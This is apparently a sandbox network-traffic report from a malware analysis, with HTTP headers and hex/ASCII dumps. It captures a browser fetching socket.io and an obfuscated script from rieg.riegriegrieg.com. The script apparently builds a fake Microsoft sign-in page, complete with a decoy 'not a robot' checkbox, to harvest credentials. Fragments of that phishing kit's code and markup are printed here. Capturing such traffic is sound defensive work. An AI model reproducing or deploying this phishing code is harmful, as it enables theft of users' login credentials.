                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6d 67 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 63 6b 41 72 72 6f 77 5c 78 32 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68
                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20<img\x20class=\x22backArrow\x22\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74
                                                                              Data Ascii: /1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 74 5c 78 32 30 61 5c 78 32 30 72 6f 62 6f 74 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                              Data Ascii: t\x20a\x20robot</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.44974618.245.31.894435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:46 UTC576OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                              Host: cdn.socket.io
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:46 UTC702INHTTP/1.1 200 OK
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Content-Length: 49993
                                                                              Connection: close
                                                                              Accept-Ranges: bytes
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                                              Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                              ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                              Server: Vercel
                                                                              Strict-Transport-Security: max-age=63072000
                                                                              X-Vercel-Cache: HIT
                                                                              X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                              X-Cache: Hit from cloudfront
                                                                              Via: 1.1 b81e506afc0d8b7cd6094e636331ca78.cloudfront.net (CloudFront)
                                                                              X-Amz-Cf-Pop: FRA56-P8
                                                                              X-Amz-Cf-Id: LYbRfvVAxlboDPgm5vH6sIMruBPbypA0_cggkVZae5AQHfpmniEyiw==
                                                                              Age: 7632717
                                                                              2024-10-26 06:48:46 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                              Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                              2024-10-26 06:48:47 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                                              Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                                              2024-10-26 06:48:47 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                                              Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                                                              2024-10-26 06:48:47 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                                                              Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449747192.185.209.04435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:47 UTC355OUTGET /n/jsnom.js HTTP/1.1
                                                                              Host: rieg.riegriegrieg.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:47 UTC366INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:47 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Last-Modified: Mon, 21 Oct 2024 10:11:55 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 100217
                                                                              Cache-Control: max-age=86400
                                                                              Expires: Sun, 27 Oct 2024 06:48:47 GMT
                                                                              Vary: Accept-Encoding
                                                                              X-Newfold-Cache-Level: 2
                                                                              Content-Type: application/javascript
                                                                              2024-10-26 06:48:47 UTC7826INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                              Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6c 6f 67 69 6e 46 6f 72 6d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30
                                                                              Data Ascii: \x20\x20\x20.loginForm\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 62 6c 61 63 6b 2c 5c 78 32 30 77 68 69 74 65 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62
                                                                              Data Ascii: ternal-light-dark(black,\x20white);\x0a\x20\x20\x20\x20\x20\x20\x20\x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20b
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 5c 78 32 30 7b 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30
                                                                              Data Ascii: 0\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.sideBar\x20{}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                              Data Ascii: 0\x20\x20\x20\x20\x20-webkit-animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 30 30 30 30 64 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78
                                                                              Data Ascii: \x20color:\x20#000000d8;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                              Data Ascii: 0\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6d 67 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 63 6b 41 72 72 6f 77 5c 78 32 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68
                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20<img\x20class=\x22backArrow\x22\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74
                                                                              Data Ascii: /1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left
                                                                              2024-10-26 06:48:47 UTC8000INData Raw: 74 5c 78 32 30 61 5c 78 32 30 72 6f 62 6f 74 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
